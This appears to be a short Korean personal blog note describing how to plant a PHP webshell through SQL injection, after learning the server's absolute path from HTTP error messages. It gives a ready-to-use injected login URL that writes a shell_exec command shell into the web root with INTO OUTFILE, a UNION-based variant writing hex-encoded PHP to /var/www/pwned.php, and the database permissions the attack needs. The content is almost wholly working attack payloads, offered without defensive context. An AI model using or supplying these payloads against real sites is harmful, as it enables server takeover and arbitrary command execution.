티스토리 뷰
http 에러 메시지를 통해 절대경로를 취득 후 webshell upload
http://test.com/login/login.php?user_id=admin';select '<?echo shell_exec($_GET["cmd"]);?>' INTO OUTFILE 'C:/APM_Setup/htdocs/abc.php';#user_pw=1234!@#$
webshell 실행 화면
UNION 구문을 이용한 방법
select ... where id=30 and 1=0 union select 0x[PHP source hex encoded] into outfile ('/var/www/pwned.php')
※ 공격 성공을 위한 조건
mysql's user has rights of writing files.
linux's user "mysql" has right +w on /var/www folder.
'기억하자정보' 카테고리의 다른 글
| 페이스북(facebook) 동영상 등록 패치 - (G4S이용자,아미나스킨 v3.3.0 기준) (0) | 2013.08.16 |
|---|---|
| 그누보드 g4s 글 내용에서 _blank 문제 (1) | 2013.08.01 |
| Error Based SQL Injection (0) | 2013.01.11 |
| UIWebView를 JavaScript로 제어하기 (0) | 2012.09.14 |
| iOS 리소스에 HTML파일을 읽어서 웹뷰 보이기 (0) | 2012.09.14 |
- 안내
- 궁금한 점을 댓글로 남겨주시면 답변해 드립니다.
